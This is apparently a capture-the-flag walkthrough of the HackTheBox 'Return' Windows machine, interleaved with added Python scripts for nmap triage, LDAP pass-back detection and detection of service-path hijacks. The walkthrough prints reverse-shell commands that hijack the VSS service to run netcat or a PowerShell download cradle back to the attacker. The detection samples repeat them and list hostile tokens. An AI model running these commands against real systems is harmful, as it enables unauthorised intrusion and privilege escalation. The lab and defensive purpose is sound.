This is my walk-through of the machine located at:

nmap scan: nmap -T4 -A -oN return.nmap

Starting Nmap 7.92 ( ) at 2021-12-20 15:01 EST
Nmap scan report for
Host is up (0.034s latency).
Not shown: 988 closed tcp ports (reset)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-20 20:26:53Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 25m06s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-20T20:27:06
|_  start_date: N/A

TRACEROUTE (using port 995/tcp)
1   39.17 ms
2   33.44 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 30.10 seconds
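To turn a scan like the one above into something a defender can act on, here is an added Python example (my own code, not part of the original post or of any nmap tooling) that parses nmap's normal (-oN) output into a port inventory and a short triage list. The sample scan embedded in it is a constructed, abridged copy of the scan above with the host name replaced by a placeholder, and the triage rules (TRACE enabled, admin panel over plain HTTP, clock skew, SMB signing) are my own choices for what I would want flagged.

```python
"""Parse nmap -oN (normal) output into a port inventory plus a defender-side triage list.
The sample below is a constructed, abridged copy of the scan above (host name replaced
by a placeholder); it is not the page's verbatim output."""
import re
from dataclasses import dataclass

SAMPLE_SCAN = """\
Nmap scan report for <TARGET>
Host is up (0.034s latency).
Not shown: 988 closed tcp ports (reset)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-20 20:26:53Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
636/tcp  open  tcpwrapped
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 25m06s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
"""

# '<port>/<proto>  <state>  <service>  [version text]'
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str


def parse_ports(scan_text: str) -> list:
    """Return one Port per port line; script output lines ('|', '|_') are ignored."""
    ports = []
    for line in scan_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), m.group(5).strip()))
    return ports


def triage(scan_text: str) -> dict:
    """Split the scan into 'exposures' worth a ticket and 'hardening' already in place."""
    ports = parse_ports(scan_text)
    open_ports = {p.number for p in ports if p.state == "open"}
    exposures, hardening = [], []

    if "Potentially risky methods: TRACE" in scan_text:
        exposures.append("HTTP TRACE is enabled on the web server; disable it")
    title = re.search(r"\|_http-title:\s*(.+)", scan_text)
    if title and "admin" in title.group(1).lower() and 80 in open_ports and 443 not in open_ports:
        exposures.append(f"'{title.group(1).strip()}' is served over plain HTTP only")
    skew = re.search(r"clock-skew:\s*(\S+)", scan_text)
    if skew:
        exposures.append(f"clock skew of {skew.group(1)} relative to the scanner; "
                         "Kerberos tolerates 5 minutes by default, so check time sync on the host")
    if 389 in open_ports:
        exposures.append("LDAP (389) is exposed; verify that simple binds require signing "
                         "or are forced to LDAPS (636)")
    if "Message signing enabled and required" in scan_text:
        hardening.append("SMB signing is required (blocks SMB relay)")

    return {"open_ports": sorted(open_ports), "exposures": exposures, "hardening": hardening}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCAN).items():
        print(key, value)
```

Running it against the real scan file (open it and pass the text to triage) gives the same kind of list; the rules are deliberately simple string and regex checks so they are easy to extend with the other nmap script outputs you care about.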

I then went on the IP Address and found this page:

I then ran gobuster on the IP Address: gobuster dir -u -w directory-list-2.3-big.txt -t 60. I ended up with the following, which wasn't very helpful:

I then found the nmap command to enumerate LDAP: nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"'. The nmap script was taking a while, so I went to the walk-through to see where I had gotten off track. I found out that I should use enum4linux to enumerate SMB, with enum4linux -a, which gave me this information:

The walk-through mentioned that we should enter our own IP Address in the Server Address section on the website. Using that I got a shell:
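The reason this works is that the printer panel will send its stored LDAP account to whatever host is typed into the Server Address field. From the defender's side, the cheap signal is network egress: a device that holds directory credentials should only ever talk LDAP to the domain controllers. Here is an added Python example (my own code, not from the original post) that flags LDAP-port connections to anything outside a DC allowlist and rates them higher when the source is a known appliance. The log format, host names and addresses (RFC 5737 ranges) are constructed for the example.

```python
"""Detect an LDAP pass-back: a host that stores directory credentials (here a printer)
opening an LDAP connection to something other than a known domain controller.
Log lines, hosts and addresses below are constructed for this example (RFC 5737 ranges)."""

KNOWN_DCS = {"192.0.2.10"}                    # assumed: the only legitimate LDAP servers
APPLIANCE_HOSTS = {"192.0.2.50": "PRINTER"}   # assumed: devices with a stored LDAP account
LDAP_PORTS = {389, 636, 3268, 3269}           # LDAP, LDAPS, Global Catalog, GC over TLS

# Constructed egress firewall log in a simple 'timestamp key=value ...' format.
SAMPLE_LOG = """\
2021-12-20T20:31:02Z src=192.0.2.50 dst=192.0.2.10 dport=389 proto=tcp action=allow
2021-12-20T20:31:40Z src=192.0.2.50 dst=203.0.113.7 dport=389 proto=tcp action=allow
2021-12-20T20:31:41Z src=192.0.2.50 dst=203.0.113.7 dport=445 proto=tcp action=deny
2021-12-20T20:32:05Z src=192.0.2.77 dst=192.0.2.10 dport=636 proto=tcp action=allow
"""


def parse_line(line: str) -> dict:
    """Turn '<timestamp> k=v k=v ...' into a dict; dport becomes an int."""
    ts, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = ts
    fields["dport"] = int(fields["dport"])
    return fields


def find_ldap_passback(log_text: str, known_dcs=KNOWN_DCS, appliances=APPLIANCE_HOSTS) -> list:
    """Return one alert per LDAP-port connection whose destination is not an allowlisted DC.
    A source that is a known appliance is rated high: its stored account is being sent
    to an address someone typed into its admin panel."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        if ev["dport"] not in LDAP_PORTS or ev["dst"] in known_dcs:
            continue
        alerts.append({
            "ts": ev["ts"],
            "src": ev["src"],
            "src_name": appliances.get(ev["src"], "unknown"),
            "dst": ev["dst"],
            "dport": ev["dport"],
            "severity": "high" if ev["src"] in appliances else "medium",
            "why": "LDAP traffic to a host that is not a known domain controller",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_ldap_passback(SAMPLE_LOG):
        print(alert)
```

The detection only tells you the credential left the building; the fixes are on the configuration side: give the printer a least-privileged lookup account rather than one that can log on to servers, restrict who can reach the admin panel, and force LDAPS so the bind is not readable by whoever is listening on the other end.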

The walk-through then mentioned using the evil-winrm tool. I learned that, while I was able to overwrite the password for the svc-printer user, it would be overwritten by its own system. The walk-through pointed out that the password would be what was shown in the output of the netcat connection earlier:

Looking around, I was able to find the user.txt flag on the Desktop of the svc-printer user:

I am not too familiar with Windows commands, so the walk-through mentioned running the net user svc-printer command:

Again, I had to view the write-up to see where to go from here. The commands upload netcat onto the system, and then configure netcat to be run and connect to your machine:

upload /usr/share/windows-resources/binaries/nc.exe

sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe <YOUR-IP> 1234". After setting up a netcat listener in another tab, I was able to get a connection:

The official walk-through got me root; however, I was not able to do anything on the machine. I then found this write-up that helped me set up a proper shell. Here are the commands I used:

Download the Nishang script for PowerShell:

Have a netcat listener open in another terminal window (using rlwrap):
rlwrap nc -lvnp <PORT>

Have a python3 HTTP server running in another terminal window:
sudo python3 -m http.server 80

Upload that to the server with the evil-winrm terminal:
sc.exe config vss binPath="C:\Windows\System32\cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('')"

Restart the executable:
sc.exe stop VSS
sc.exe start VSS
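Both of the binPath changes above end up as a write to the service's ImagePath value under HKLM\System\CurrentControlSet\Services, which is where a defender can catch this. Here is an added Python example (my own code, not from the original post or the write-ups it links) that runs over Sysmon Event ID 13 (registry value set) records and flags ImagePath values pointing outside trusted directories or carrying cmd.exe /c, powershell, iex( or netcat-style arguments. The events are constructed dicts whose field names follow Sysmon's; the user, image and address values are made up for the example, and the Sysmon configuration is assumed to include the Services key.

```python
"""Flag service ImagePath changes that look like a service binary hijack, using Sysmon
Event ID 13 (RegistryEvent: SetValue). Events are constructed samples in dict form;
field names follow Sysmon's, values (user, image, addresses) are made up for this example."""
import re

# Only ImagePath values under the Services key are of interest here.
SERVICE_IMAGEPATH_RE = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)

TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")
SUSPICIOUS_TOKENS = ("cmd.exe /c", "powershell", "iex(", "downloadstring", "nc.exe", " -e cmd")

SAMPLE_EVENTS = [
    {"EventID": 13, "EventType": "SetValue", "User": "RETURN\\svc-printer",
     "Image": r"C:\Windows\System32\sc.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VSS\ImagePath",
     "Details": r"C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 203.0.113.7 1234"},
    {"EventID": 13, "EventType": "SetValue", "User": "RETURN\\svc-printer",
     "Image": r"C:\Windows\System32\sc.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VSS\ImagePath",
     "Details": r"C:\Windows\System32\cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://203.0.113.7/example.ps1')"},
    {"EventID": 13, "EventType": "SetValue", "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VSS\ImagePath",
     "Details": r"%systemroot%\system32\vssvc.exe"},          # benign: the real VSS binary
    {"EventID": 13, "EventType": "SetValue", "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VSS\Start",
     "Details": "DWORD (0x00000003)"},                          # not ImagePath: ignored
]


def _exe_path(details: str) -> str:
    """Return the lower-cased executable portion of an ImagePath value, with the
    %SystemRoot% / \\SystemRoot aliases and bare 'system32\\' paths expanded."""
    d = details.strip().lower()
    if d.startswith('"'):
        end = d.find('"', 1)
        d = d[1:end] if end > 0 else d[1:]
    else:
        d = d.split(" ", 1)[0]
    for alias in ("%systemroot%", "\\systemroot"):
        if d.startswith(alias):
            d = "c:\\windows" + d[len(alias):]
    if d.startswith("system32\\"):
        d = "c:\\windows\\" + d
    return d


def classify_imagepath(details: str) -> list:
    """Return the reasons an ImagePath value is suspicious (empty list means benign)."""
    reasons = []
    exe = _exe_path(details)
    if not exe.startswith(TRUSTED_DIRS):
        reasons.append(f"binary outside trusted directories: {exe}")
    hits = [t.strip() for t in SUSPICIOUS_TOKENS if t in details.lower()]
    if hits:
        reasons.append("suspicious tokens in ImagePath: " + ", ".join(hits))
    return reasons


def detect_service_hijack(events: list) -> list:
    """One alert per SetValue on a service ImagePath whose new value looks hijacked."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
            continue
        m = SERVICE_IMAGEPATH_RE.match(ev.get("TargetObject", ""))
        if not m:
            continue
        reasons = classify_imagepath(ev.get("Details", ""))
        if reasons:
            alerts.append({"service": m.group(1), "user": ev.get("User"),
                           "image": ev.get("Image"), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_service_hijack(SAMPLE_EVENTS):
        print(alert)
```

Changing a service's binPath needs the right to change service configuration, so the alert is worth pairing with a review of which groups grant that right on the host; a service account that only needs to print should not be able to reconfigure VSS in the first place.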

I was then able to get the root.txt file:
